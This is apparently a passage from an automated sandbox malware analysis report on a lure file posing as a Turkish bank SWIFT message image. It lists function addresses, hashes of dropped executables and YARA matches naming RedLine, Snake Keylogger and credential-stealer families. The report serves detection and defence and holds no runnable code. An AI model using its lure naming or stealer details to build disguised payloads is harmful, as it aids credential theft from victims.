Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06426500	10_2_06426500
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642A508	10_2_0642A508
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06423710	10_2_06423710
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06426510	10_2_06426510
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642A518	10_2_0642A518
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06423720	10_2_06423720
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06428D21	10_2_06428D21
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06421728	10_2_06421728
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642FB28	10_2_0642FB28
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06428D30	10_2_06428D30
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642E330	10_2_0642E330
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06421738	10_2_06421738
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06427539	10_2_06427539
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06421BC1	10_2_06421BC1
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642C1C8	10_2_0642C1C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06421BD0	10_2_06421BD0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06425BD0	10_2_06425BD0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642A9D1	10_2_0642A9D1
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06425BE0	10_2_06425BE0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642A9E0	10_2_0642A9E0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06422DE0	10_2_06422DE0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064291E8	10_2_064291E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06422DF0	10_2_06422DF0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064291F8	10_2_064291F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06420DF8	10_2_06420DF8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642E7F8	10_2_0642E7F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06424980	10_2_06424980
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06429B88	10_2_06429B88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642F189	10_2_0642F189
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06428390	10_2_06428390
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642F198	10_2_0642F198
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064283A0	10_2_064283A0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06423BAA	10_2_06423BAA
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06426BA9	10_2_06426BA9
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642D9AD	10_2_0642D9AD
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642D9B0	10_2_0642D9B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06423BB8	10_2_06423BB8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0642C1BE	10_2_0642C1BE
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06468E08	10_2_06468E08
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06462688	10_2_06462688
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06460040	10_2_06460040
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646C648	10_2_0646C648
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06469448	10_2_06469448
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646F850	10_2_0646F850
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646B068	10_2_0646B068
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646E268	10_2_0646E268
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06463A70	10_2_06463A70
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06462678	10_2_06462678
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646F208	10_2_0646F208
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646C008	10_2_0646C008
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461820	10_2_06461820
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646AA28	10_2_0646AA28
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646DC28	10_2_0646DC28
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461830	10_2_06461830
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06469438	10_2_06469438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646A0C8	10_2_0646A0C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646D2C8	10_2_0646D2C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064658D0	10_2_064658D0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646BCE8	10_2_0646BCE8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646EEE8	10_2_0646EEE8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461CE9	10_2_06461CE9
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064604F8	10_2_064604F8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461CF8	10_2_06461CF8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06463CF9	10_2_06463CF9
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06460E88	10_2_06460E88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646CC88	10_2_0646CC88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06469A88	10_2_06469A88
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06460E98	10_2_06460E98
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646B6A8	10_2_0646B6A8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646E8A8	10_2_0646E8A8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646DF48	10_2_0646DF48
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646AD48	10_2_0646AD48
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461359	10_2_06461359
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646C968	10_2_0646C968
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06469768	10_2_06469768
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06461368	10_2_06461368
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646FB70	10_2_0646FB70
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646D908	10_2_0646D908
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06460508	10_2_06460508
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646A708	10_2_0646A708
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646C328	10_2_0646C328
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06469128	10_2_06469128
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646F528	10_2_0646F528
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646DF38	10_2_0646DF38
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064621C0	10_2_064621C0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064609C0	10_2_064609C0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646B9C8	10_2_0646B9C8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646EBC8	10_2_0646EBC8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_064609D0	10_2_064609D0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646A3E8	10_2_0646A3E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646D5E8	10_2_0646D5E8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0646F1F8	10_2_0646F1F8

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe 7799DAC5FDF78F132FA4F65DD31ABE052CB68EEB17EDA71E63A0365077C6DE15
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Native_snake01.exe F3206DA0BBB65CBE611245A9C3CE4A6EC550A3203BE4C2F0D4766DCE1959ADD1

Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: String function: 05DF3110 appears 44 times

Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1750593373.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1745025160.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756398252.0000000005580000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1750593373.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1758472430.0000000007550000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000008.00000002.1730050821.0000000002830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000008.00000002.1730050821.0000000002830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000008.00000002.1729741377.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000008.00000002.1729741377.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs Ziraat_Bankasi_Swift_Messaji.png.exe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Binary or memory string: OriginalFilenameIrgg.exeH vs Ziraat_Bankasi_Swift_Messaji.png.exe

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Ziraat_Bankasi_Swift_Messaji.png.exe.2864740.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
